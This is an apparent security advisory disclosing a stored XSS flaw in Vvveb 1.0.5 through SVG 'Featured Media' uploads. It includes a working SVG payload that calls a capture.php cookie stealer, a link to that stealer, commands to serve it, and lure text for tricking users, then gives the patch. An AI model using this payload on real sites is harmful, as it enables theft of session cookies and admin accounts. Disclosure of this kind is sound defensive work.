Vvveb 1.0.5 | Authenticated Stored XSS on uploading image in posts & pages

Basic Information

Software Type Web App
Software Name Vvveb
Affected Version 1.0.5
Software Vendor Vvveb
Software Link https://github.com/givanz/Vvveb
Severity High
CVSS Score 8.0
Affected Assets 100+
Date of Discovery Jan 3rd, 2025

Description

The endpoint at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] is vulnerable to XSS, an attacker can trigger XSS by uploading malicious SVG image payload as “Featured Media”.
The payload can be triggered by opening the image in a new tab, this requires user interaction but the payload is executed without alarming the user.

Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of users, other site admins, editors or even super admins.

Reproduce

To reproduce the issue, navigate to any of these endpoints to view posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

Edit a post or a page (both are very similar):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page

On the right sidebar, click on “Featured Media” to upload a new image. Create the following SVG image:
echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300"><rect width="300" height="300" fill="red" /><text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">Please open the image in a new tab to see it</text><image href="http://127.0.0.1:1718/capture.php" width="300" height="200" /></svg>' > payload.svg

Upload payload.svg and save the post.
To trigger XSS, open image using its full path:
http://127.0.0.1/media//payload.svg

When you open it, a request is sent to the following URL:
http://127.0.0.1:1718/capture.php

capture.php is a cookie stealer that steals cookies of logged-in users. You can download this PHP file from here:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Save it as capture.php and start a PHP server to serve it:
php -S 0.0.0.0:1718

Additionally, SVG images can be configured to show a specific text such as:
“Open this image in a new tab”

Which can lure users into opening image in a new tab and triggering XSS.

Proof of Concept (PoC) Video

PoC Exploit

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Mitigation

Deny uploading SVG images altogether.

Patch

Vvveb added svg extension to $uploadDenyExtensions for media library/modal file upload



Posted on: January 10, 2025 10:48 PM